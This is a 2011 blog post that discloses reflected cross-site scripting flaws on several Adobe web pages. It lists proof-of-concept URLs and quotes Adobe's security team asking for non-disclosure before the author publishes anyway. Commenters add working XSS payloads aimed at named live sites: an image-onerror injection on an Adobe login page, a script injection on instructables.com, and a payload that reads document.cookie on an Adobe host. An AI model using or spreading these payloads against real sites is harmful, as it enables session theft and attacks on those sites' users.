Wednesday, September 7, 2011

Several XSS inside Adobe website


all flaws reported 2 months ago and today are still alive!






Proof of Concept:

http://www.adobe.com/cfusion/tdrc/modal/download_suite.cfm?product=XSS

http://www.adobe.com/cfusion/tdrc/modal/signin.cfm?product=XSS

http://www.adobe.com/cfusion/type/search.cfm?category_type=All&term=XSS

http://groups.adobe.com/index.cfm?event=people.login&redirect=XSS

https://tv.adobe.com/login/login?redirect=XSS

http://www.adobe.com/products/creativesuite/mastercollection/buying-guide.html/XSS


Note: This is a proof of concept and it doesn't reflect the views or interests of above website!









On June 20th I received an email response from Adobe

cc Adobe PSIRT
data 20 iunie 2011, 23:24
subiect Re: Adobe product security vulnerability feedback form

Thank you very much for the report and proof-of-concepts. We are looking into it now, and will let you know if we have any questions. In the meantime, we ask that you do not publicly disclose this potential issue, in order to protect Adobe's customers.

We appreciate your discretion and cooperation. We will get back to you soon. Please let us know if you have any questions.

Thank you again,

Josh
Adobe Product Security Incident Response Team


has passed more than 2 months and still nothing so I decided to disclose this....

4 comments:

Anonymous said...

Here, one more:

https://www.adobe.com/login/choosecountry.jsp?next=%22%3E%3Cimg%20src=x%20onerror=prompt(1)%3E

Luis Santana said...

Nice find. I've run into a lot of times where similar situations have happened to me. For example:
http://www.instructables.com/tag/?q=%27%3E%22%3E%3Cscript%3Ealert%280%29;%3C/script%3E&sort=none

I reported this in my blog June 16th 2010 and it's still vuln over a year later (link to blog post is at http://blog.hacktalk.net/instructables-com-xss-vulnerability/ )

Sadly it seems that some people just don't care about site security.

gem1210 said...

http://yoseif.host.adobe.com/loan.cgi
xss postdata "/>alert(document.cookie);

VMw4r3

d3v1l said...

have much more ..shame !